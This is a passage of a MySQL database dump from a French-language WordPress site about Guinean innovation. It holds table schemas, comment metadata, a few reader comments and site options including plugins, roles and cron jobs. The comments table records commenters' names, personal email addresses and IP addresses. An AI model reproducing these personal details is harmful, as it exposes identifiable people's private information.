),(286,0,0),(289,0,0),(290,0,0),(292,0,0),(295,0,0),(297,0,0),(300,0,0),(301,0,0),(303,0,0),(306,0,0),(307,0,0),(309,0,0),(312,0,0),(313,0,0),(329,0,0),(334,0,0),(337,0,0),(351,0,0),(358,0,0),(359,0,0),(360,0,0),(363,0,0),(364,0,0),(366,0,0),(367,0,0),(368,0,0),(369,0,0),(370,0,0),(372,0,0),(373,0,0),(374,0,0),(378,0,0),(380,0,0),(383,0,0),(385,0,0),(387,0,0),(394,0,0),(395,0,0),(396,0,0),(397,0,0),(398,0,0),(400,0,0),(401,0,0),(405,0,0),(406,0,0),(411,0,0),(412,0,0),(416,6,0),(417,0,0),(420,0,0),(421,0,0),(422,0,0),(423,0,0),(424,0,0),(425,0,0),(426,0,0),(427,0,0),(428,0,0),(431,0,0),(432,0,0),(443,0,0),(466,0,0),(468,0,0),(470,0,0),(524,0,0),(526,0,0),(538,0,0),(552,0,0),(573,0,0),(576,0,0),(577,0,0),(578,0,0),(579,0,0),(580,0,0),(581,0,0),(582,0,0),(583,0,0),(584,0,0),(585,0,0),(587,0,0),(588,0,0),(590,0,0),(603,0,0),(610,0,0),(612,0,0),(613,0,0),(615,0,0),(617,0,0),(619,0,0),(624,0,0),(625,0,0),(626,0,0),(632,0,0),(638,0,0),(639,0,0),(644,0,0),(661,0,0),(662,0,0),(664,0,0),(668,0,0),(669,0,0),(670,0,0),(675,0,0),(676,0,0),(677,0,0),(678,0,0),(681,0,0),(686,0,0),(687,0,0),(688,0,0),(689,0,0),(690,0,0),(691,0,0),(692,0,0),(693,0,0),(694,0,0),(695,0,0),(696,0,0),(697,0,0),(698,0,0),(699,0,0),(700,0,0),(701,0,0),(702,0,0),(703,0,0),(704,0,0),(705,0,0),(706,0,0),(707,0,0),(708,0,0),(709,0,0),(710,0,0),(711,0,0),(712,0,0),(713,0,0),(714,0,0),(715,0,0),(716,0,0),(717,0,0),(718,0,0),(719,0,0),(720,0,0),(721,0,0),(722,0,0),(723,0,0),(724,0,0),(725,0,0),(726,0,0),(727,0,0),(728,0,0),(729,0,0),(730,0,0),(731,0,0),(732,0,0),(733,0,0),(734,0,0),(735,0,0),(736,0,0),(737,0,0),(738,0,0),(739,0,0),(774,0,0),(782,0,0),(783,0,0),(793,0,0),(794,0,0),(795,0,0),(796,0,0),(797,0,0),(798,0,0),(799,0,0),(800,0,0),(801,0,0),(802,0,0),(803,0,0),(804,0,0),(805,0,0),(806,0,0),(807,0,0),(808,0,0),(809,0,0),(810,0,0),(811,0,0),(812,0,0),(813,0,0),(816,0,0),(817,0,0),(835,0,0),(839,0,0),(843,0,0),(846,0,0),(880,0,0),(881,0,0),(882,0,0),(883,0,0),(884,0,0),(885,0,0),(886,0,0),(887,0,0),(896,0,0),(897,1,0),(902,0,0),(903,0,0),(904,0,0),(905,0,0),(906,0,0),(907,0,0),(908,0,0),(909,0,0),(915,0,0),(916,0,0),(917,0,0),(921,0,0),(929,0,0),(930,0,0),(931,0,0),(937,0,0);
/*!40000 ALTER TABLE `wpfy_yoast_seo_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_commentmeta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=21 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_commentmeta`
--

LOCK TABLES `wpstg0_commentmeta` WRITE;
/*!40000 ALTER TABLE `wpstg0_commentmeta` DISABLE KEYS */;
INSERT INTO `wpstg0_commentmeta` VALUES (1,2,'akismet_error','1509462081'),(2,2,'akismet_history','a:3:{s:4:\"time\";d:1509462081.2702128887176513671875;s:5:\"event\";s:11:\"check-error\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(4,2,'akismet_delayed_moderation_email','1'),(5,3,'akismet_error','1509487345'),(6,3,'akismet_history','a:3:{s:4:\"time\";d:1509487345.5077149868011474609375;s:5:\"event\";s:11:\"check-error\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(8,3,'akismet_delayed_moderation_email','1'),(9,3,'akismet_history','a:3:{s:4:\"time\";d:1509487940.440680980682373046875;s:5:\"event\";s:15:\"status-approved\";s:4:\"user\";s:11:\"fmbangoura7\";}'),(10,4,'akismet_error','1509487941'),(11,4,'akismet_history','a:4:{s:4:\"time\";d:1509487941.0296230316162109375;s:5:\"event\";s:11:\"check-error\";s:4:\"user\";s:11:\"fmbangoura7\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(13,2,'akismet_history','a:3:{s:4:\"time\";d:1509487955.1777191162109375;s:5:\"event\";s:15:\"status-approved\";s:4:\"user\";s:11:\"fmbangoura7\";}'),(14,5,'akismet_error','1510180181'),(15,5,'akismet_history','a:3:{s:4:\"time\";d:1510180181.684585094451904296875;s:5:\"event\";s:11:\"check-error\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}'),(17,5,'akismet_delayed_moderation_email','1'),(18,5,'akismet_history','a:3:{s:4:\"time\";d:1510222144.03335094451904296875;s:5:\"event\";s:15:\"status-approved\";s:4:\"user\";s:11:\"fmbangoura7\";}'),(19,6,'akismet_error','1510222565'),(20,6,'akismet_history','a:4:{s:4:\"time\";d:1510222565.92611598968505859375;s:5:\"event\";s:11:\"check-error\";s:4:\"user\";s:11:\"fmbangoura7\";s:4:\"meta\";a:1:{s:8:\"response\";s:7:\"invalid\";}}');
/*!40000 ALTER TABLE `wpstg0_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_comments`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_comments`
--

LOCK TABLES `wpstg0_comments` WRITE;
/*!40000 ALTER TABLE `wpstg0_comments` DISABLE KEYS */;
INSERT INTO `wpstg0_comments` VALUES (2,416,'Dore Jacques Sinata','doresinatajacques9@gmail.com','','41.242.89.95','2017-10-31 15:01:21','2017-10-31 15:01:21','Bravo à cette belle initiative mais en outre vouloir construire la plus part des maisons en bois, ceci provoquera une conséquence négative sur la nature dont la déforestation abusive qui va à l\'encontre des initiatives de la cop 21. Donc prière de trouver une solution pouvant protéger la végétation de façon générale tout en mettant en valeur cette idée innovante ! Merci',0,'1','Mozilla/5.0 (Linux; Android 5.1; itel it1408 Build/LMY47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/49.0.2623.105 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/60.0.0.16.76;]','',0,0),(3,632,'Samba Sory','camaratri83@gmail.com','','197.149.221.81','2017-10-31 22:02:25','2017-10-31 22:02:25','Vraiment encourageant ces jeunes et vous qui faites connaître leurs activités.',0,'1','Mozilla/5.0 (Linux; Android 5.1; TECNO-L8 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/66.0.0.33.73;]','',0,0),(4,632,'fmbangoura7','admin@guineeinnove.nimbasolution.com','','41.223.49.245','2017-10-31 22:12:20','2017-10-31 22:12:20','Tous le plaisir est partagé. Vue que nous sommes au début de notre activité, nous vous demandons d\'aimer notre page Facebook et surtout de la partagée afin de donner encore plus de visibilité à ces gens.',0,'1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','',3,1),(5,613,'Kemoko Millimono','kemokomillimono@gmail.com','','41.79.201.240','2017-11-08 22:29:41','2017-11-08 22:29:41','Je trouve cella très opportun, je tiens à remercier très sincèrement l\'auteur de cette plate-forme et je salut l\'initiative c\'est bien et bon courage.',0,'1','Mozilla/5.0 (Linux; Android 6.0; TECNO-C9 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/77.0.0.20.66;]','',0,0),(6,613,'fmbangoura7','admin@guineeinnove.nimbasolution.com','','41.223.49.245','2017-11-09 10:16:05','2017-11-09 10:16:05','Merci Millimono, je t\'invite à liker la page facebook de la plateforme Guinée innovations.',0,'1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','',5,1);
/*!40000 ALTER TABLE `wpstg0_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_links`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_links`
--

LOCK TABLES `wpstg0_links` WRITE;
/*!40000 ALTER TABLE `wpstg0_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpstg0_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_options`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=InnoDB AUTO_INCREMENT=2494 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_options`
--

LOCK TABLES `wpstg0_options` WRITE;
/*!40000 ALTER TABLE `wpstg0_options` DISABLE KEYS */;
INSERT INTO `wpstg0_options` VALUES (1,'siteurl','https://guineeinnove.nimbasolution.com/1512723081474','yes'),(2,'home','https://guineeinnove.nimbasolution.com/1512723081474','yes'),(3,'blogname','Guinée innovations','yes'),(4,'blogdescription','Toutes les innovations de la Guinée en un seul endroit.','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','admin@guineeinnove.nimbasolution.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','50','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','','yes'),(29,'rewrite_rules','','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:11:{i:0;s:35:\"redux-framework/redux-framework.php\";i:1;s:19:\"akismet/akismet.php\";i:2;s:36:\"contact-form-7/wp-contact-form-7.php\";i:3;s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";i:4;s:23:\"elementor/elementor.php\";i:5;s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";i:6;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";i:7;s:26:\"popup-by-supsystic/pps.php\";i:8;s:27:\"trackserver/trackserver.php\";i:9;s:24:\"wordpress-seo/wp-seo.php\";i:10;s:25:\"wp-staging/wp-staging.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:3:{i:0;s:121:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/plugins/facebook-like-box-widget/facebook-like-box-widget.php\";i:1;s:121:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/plugins/facebook-like-box-pop-up/facebook-like-box-pop-up.php\";i:2;s:0:\"\";}','no'),(40,'template','magzma','yes'),(41,'stylesheet','magzma','yes'),(42,'comment_whitelist','1','yes'),(43,'blacklist_keys','','no'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','38590','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:3:{s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:35:\"monsterinsights_lite_uninstall_hook\";s:45:\"custom-facebook-feed/custom-facebook-feed.php\";s:13:\"cff_uninstall\";s:26:\"popup-by-supsystic/pps.php\";a:2:{i:0;s:8:\"utilsPps\";i:1;s:12:\"deletePlugin\";}}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','360','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','426','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wpstg0_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:65:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:20:\"wpseo_manage_options\";b:1;s:15:\"use_trackserver\";b:1;s:19:\"trackserver_publish\";b:1;s:17:\"trackserver_admin\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:37:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:15:\"use_trackserver\";b:1;s:19:\"trackserver_publish\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:11:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:15:\"use_trackserver\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:37:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:3:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;i:4;a:0:{}}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:4:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:14:\"recent-posts-4\";i:1;s:19:\"social_box-widget-3\";}s:8:\"footer-1\";a:0:{}s:15:\"primary-sidebar\";a:2:{i:0;s:17:\"facebooklikebox-3\";i:1;s:9:\"do-etfw-3\";}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'cron','a:8:{i:1512733789;a:1:{s:29:\"akismet_schedule_cron_recheck\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1512740924;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1512740951;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1512745281;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1512747264;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1512750442;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1512777660;a:1:{s:26:\"monsterinsights_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}